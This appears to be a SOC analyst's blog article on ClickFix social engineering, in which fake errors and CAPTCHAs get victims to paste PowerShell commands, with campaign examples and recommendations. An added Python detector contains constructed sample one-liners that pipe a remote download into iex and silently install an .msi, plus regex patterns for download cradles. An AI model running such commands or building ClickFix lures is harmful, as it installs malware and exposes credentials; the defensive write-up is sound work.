ClickFix: The Returning Threat


ClickFix is a social engineering tactic that manipulates users into performing malicious actions under the guise of troubleshooting or system maintenance. By displaying fake error messages and fake CAPTCHA verifications, attackers persuade users to copy and paste malicious commands into the terminal or PowerShell.
FPT Threat Intelligence has also published an article on these campaigns; see Warning about a new attack form impersonating Google Chrome to launch malicious PowerShell in the References below.
How ClickFix Works
The name ClickFix describes the scenario: the victim is persuaded to click a link or run a command that they believe will fix a problem, with the lure disguised as a trusted service (Google Meet, Booking.com, Cloudflare) or as an IT support team.
The fake problem reaches the target through phishing emails, pop-up alerts, or fake system notifications, all written to create urgency. Under that pressure, users disable security controls, download malware, or grant attackers remote access without realising what they have done.
The most dangerous form is the one in which the attacker tells the user to copy a prepared command and paste it into a command-line interface such as PowerShell (Windows) or Terminal (macOS/Linux).
Figure 1. Fake error message tricking users into copying and executing code in PowerShell
ClickFix exploits no software vulnerability; the victim's own keystrokes do the work. Modern security products are good at blocking drive-by downloads and malicious attachments, but a command that the user types themselves is not a file that the browser or mail gateway can inspect. Once the command runs, the attacker holds whatever access the victim's account has, which is enough for data theft, credential exposure, or full takeover of the machine.
A newer variant replaces the error message with a fake CAPTCHA: instead of selecting images or ticking a box, the "verification" step asks the user to paste a command into PowerShell or Terminal.
Figure 2. Fake CAPTCHA message tricking users into copying and executing code in PowerShell
Recent Increase in ClickFix Attacks
Cybersecurity researchers have noted a sharp increase in ClickFix-based attacks since late 2024. Two prominent campaigns illustrate this trend:
OBSCURE#BAT Campaign – Targets English-speaking users in the US, Canada, Germany, and the UK with fake CAPTCHA verification pages. Victims are redirected to what looks like a legitimate Cloudflare CAPTCHA page and are tricked into copying and running a malicious .bat script that installs malware.
Phishing Campaign Storm-1865 – Attackers impersonate Booking.com to target the hospitality industry in North America, Europe, and Asia. The email claims the business has received a negative review from a guest and prompts the recipient to open a link or an attached PDF. Victims who comply expose their credentials and are infected with malware.
Example 1: Attack on a Non-Profit Organization in North America
An employee was tricked into executing the following command:
This is a PowerShell one-liner designed to download and execute a remote script without the user noticing. It:
Launches PowerShell with a hidden window, so no console appears.
Builds an identifier from the current timestamp (Unix time).
Downloads the script from a server (138.199.161[.]141:8080) using Invoke-RestMethod (irm).
Pipes the downloaded text straight into Invoke-Expression (iex), which executes it immediately.
Because the script runs from memory and is never saved as a .ps1 file, the PowerShell execution policy does not apply to it at all.
This script is configured to install AsyncRAT – a powerful open-source Remote Access Tool (RAT) commonly used for monitoring, keystroke logging, credential theft, and remote control of infected systems.
The IP address 138.199.161[.]141 is located in Germany and was flagged as malicious by one security vendor on VirusTotal at the time of writing.
Example 2: Attack on a Canadian Construction Company
The attacker attempted to trick an employee into executing the command:
This command is designed to silently download and install a malicious MSI package. It:
Runs PowerShell with a hidden window.
Downloads the .msi file from https[:]//overtimeforus.com/dow using Invoke-WebRequest (iwr).
Saves it to the Public directory and then executes it.
The command ends with a comment that reads like a Cloudflare verification step. A PowerShell comment has no effect on what runs; it is there only so that the pasted text looks like a legitimate security check to the victim.
This URL was flagged as malicious by 10 security vendors on VirusTotal at the time of writing.
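The two commands above share traits that a SOC can score directly on process command lines: a hidden window, a download cradle (irm or iwr), a pipe into iex, an IP-literal host, a drop into the Public directory, an .msi payload, and a decorative "verification" comment. The following Python is an example added to this article, not tooling from FPT Threat Intelligence or from the campaigns described. The sample command lines, the hosts 203.0.113.10 and example.invalid, and the file paths are constructed placeholders, not the article's indicators.

```python
"""Heuristic scorer for ClickFix-style PowerShell one-liners.

Example code added to this article; it is not FPT Threat Intelligence's tooling.
The command lines below are constructed to mirror the two patterns described
in Examples 1 and 2 (hosts, paths and file names are placeholders, not the
article's indicators).
"""
import re
from dataclasses import dataclass

# (rule name, pattern, weight). Case-insensitive because PowerShell is;
# aliases (irm, iwr, iex) are matched as whole words.
RULES = [
    ("hidden_window", r"-w(?:in|indowstyle)?\s+hidden\b", 2),
    ("download_cradle", r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b", 2),
    ("in_memory_exec", r"\b(?:iex|Invoke-Expression)\b", 2),
    ("pipe_to_iex", r"\|\s*(?:iex|Invoke-Expression)\b", 2),
    ("ip_literal_host", r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?", 1),
    ("public_dir_drop", r"(?:C:\\Users\\Public|\$env:PUBLIC)", 1),
    ("msi_payload", r"\.msi\b", 1),
    # A '#' comment mentioning a verification step: decoration for the victim,
    # no effect on execution.
    ("fake_verification_comment", r"#[^\n;\"]*(?:cloudflare|captcha|verif)", 2),
]
COMPILED = [(name, re.compile(rx, re.I), weight) for name, rx, weight in RULES]
THRESHOLD = 4  # a download cradle alone (weight 2) is normal admin work, not an alert


@dataclass
class Finding:
    command_line: str
    matched_rules: list
    score: int

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def analyze_command_line(cmd: str) -> Finding:
    """Score one process command line (e.g. from Sysmon Event 1 or Security 4688)."""
    hits = [(name, weight) for name, rx, weight in COMPILED if rx.search(cmd)]
    return Finding(cmd, [n for n, _ in hits], sum(w for _, w in hits))


def scan(command_lines):
    """Return only the findings that cross the alert threshold, in input order."""
    return [f for f in map(analyze_command_line, command_lines) if f.suspicious]


# Constructed samples: two ClickFix-like lines, then three benign ones.
SAMPLE_COMMAND_LINES = [
    # Example 1 pattern: hidden window, Unix-time identifier, irm piped into iex
    r'powershell -w hidden -c "$i=[int](Get-Date -UFormat %s); irm http://203.0.113.10:8080/$i | iex"',
    # Example 2 pattern: iwr to an .msi in the Public directory, run it, fake verification comment
    r'powershell -w hidden -c "iwr https://example.invalid/dow -OutFile $env:PUBLIC\setup.msi; Start-Process $env:PUBLIC\setup.msi # Cloudflare verification"',
    r'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r'powershell -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1',
    r'powershell -Command "Invoke-WebRequest https://downloads.example.invalid/tool.zip -OutFile C:\Temp\tool.zip"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"score={f.score} rules={','.join(f.matched_rules)}")
        print(f"  {f.command_line}")
```

Only the two ClickFix-like lines cross the threshold; the legitimate Invoke-WebRequest download scores 2 and stays silent, which is the point of weighting combinations rather than single keywords. In production the same rules would run over Sysmon Event 1 / Security 4688 command lines, or over PowerShell script block text, and the score would be joined with the parent process and user so that an interactive launch by an ordinary user ranks higher than the same string from a management tool.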
Recommendations
FPT Threat Intelligence recommends organizations and individuals take several measures to prevent these attack campaigns:
Limit Command Line Usage
Implement policies that restrict the use of PowerShell, Terminal, and CMD for non-administrative users.
Disable the ability to run scripts from untrusted sources, but do not rely on the PowerShell execution policy for this: it only governs script files, is not a security boundary, and does nothing against a pasted irm | iex one-liner. Enforce PowerShell Constrained Language Mode through AppLocker or WDAC, and turn on Script Block Logging (Event ID 4104) so that any command a user is tricked into pasting is recorded.
Deploy Advanced Threat Detection Solutions
Use Managed Detection and Response (MDR) services such as Field Effect MDR for continuous monitoring and anomaly detection.
Behavioural analysis can catch the ClickFix chain itself: a PowerShell process started interactively by a user, with a hidden window, that immediately fetches and executes content from the internet is rare in normal work and should raise an alert.
Enhance Email and Web Filtering
Block phishing emails that lure users into running malicious scripts.
Use sandboxing to inspect attachments and links before they reach the inbox.
Train Users to Recognize ClickFix
Employees should be skeptical of unexpected troubleshooting instructions and never enter commands into PowerShell or CMD without verifying the source.
IT teams should regularly conduct phishing simulations to reinforce awareness.
Maintain Security Updates
Regularly update software and security policies.
Conduct periodic vulnerability assessments to identify weaknesses before they are exploited.
References
Warning about a new attack form impersonating Google Chrome to launch malicious PowerShell
ClickFix: The rising threat of social engineering through fake fixes
Written by Tran Hoang Phong
Just a SOC Analyst ^^